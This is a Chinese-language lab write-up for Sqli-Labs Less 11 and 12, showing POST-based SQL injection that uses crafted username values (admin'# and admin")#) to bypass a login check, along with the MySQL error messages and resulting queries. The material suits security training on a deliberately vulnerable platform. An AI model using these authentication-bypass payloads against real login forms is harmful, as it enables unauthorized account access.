Chybeta

Sqli-Labs:Less11~12-writeup

Sqli-Labs是用来练习sql注入的好平台。project地址:https://github.com/Audi-1/sqli-labs
本文测试环境:使用phpstudy集成环境。mysql版本:5.5.53

Less-11 POST-Error Based -Single quotes- String
Less-12 POST - Error Based -Double quotes - String

考察post注入,所以要借助工具。比如burp。

Less 11

当post的数据如下时:

1
uname=admin'&passwd=chybeta&submit=Submit

报错语句为:

1
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'chybeta' LIMIT 0,1' at line 1

当post数据如下时:

1
uname=admin&passwd=chybeta'&submit=Submit

报错语句为:

1
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''chybeta'' LIMIT 0,1' at line 1

用如下payload即可登陆成功:

1
uname=admin'#&passwd=chybeta&submit=Submit

这样后台的语句为:

1
SELECT username, password FROM users WHERE username='admin'#' and password='chybeta' LIMIT 0,1

Less 12

和Less 11差不多,将单引号换成双引号。

post数据为:

1
uname=admin"&passwd=chybeta&submit=Submit

报错语句为:

1
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'chybeta") LIMIT 0,1' at line 1

发现有括号保护。

最后的payload:

1
uname=admin")#&passwd=chybeta&submit=Submit

后台查询语句为:

1
SELECT username, password FROM users WHERE username=("admin")#") and password=("chybeta") LIMIT 0,1

点击赞赏二维码,您的支持将鼓励我继续创作!
chybeta WeChat Pay

微信打赏

chybeta Alipay

支付宝打赏